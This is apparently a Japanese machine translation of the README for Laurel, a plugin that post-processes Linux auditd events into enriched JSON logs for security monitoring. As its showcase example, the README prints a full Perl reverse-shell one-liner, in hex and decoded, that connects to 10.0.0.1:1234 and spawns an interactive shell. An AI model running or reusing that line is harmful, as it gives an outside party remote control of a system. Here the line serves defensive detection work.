laurel
v0.6.4
Laurelは、 Auditd(8)のイベント後処理プラグインであり、最新のセキュリティ監視セットアップに適した有用で濃縮されたJSONベースの監査ログを生成します。
最新の安定したリリースに対応するドキュメントは、こちらをご覧ください。
TLDR:このように見える監査イベントの代わりに…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…ローレルはそれらをJSONログに変えます。そこでは、攻撃者/侵入テスター/レッドチームが作ろうとしている混乱が一見して明らかになります。
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}
これは、ローレルが監査イベントが生成されるホストで実行されるため、ソースで発生します。イベントには、親プロセスに関する有用な情報(PPID)が豊富です。
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
構成と運用の詳細については、Laurel(8)のマニュアルページに記載されています。ログ形式と根拠の詳細は、Laurel-About(7)マニュアルページをご覧ください。 Laurel-Audit-Rule(7)ページには、攻撃者の戦術を検出するのに役立つ監査ルールを構成するためのアドバイスと例が含まれています。
ローレルのインストール手順には、ソースからラリュエルを構築する方法と、それをインストールして構成する方法に関する指示が含まれています。
私たちは、既存のプロジェクトと製品の機能セットとパフォーマンス特性に満足していなかったため、ローレルを開発しました。詳細については、パフォーマンスドキュメントを参照してください。
GNU一般公開ライセンス、バージョン3
ロゴは、Birgit Meyer <[email protected]>によって作成されました。
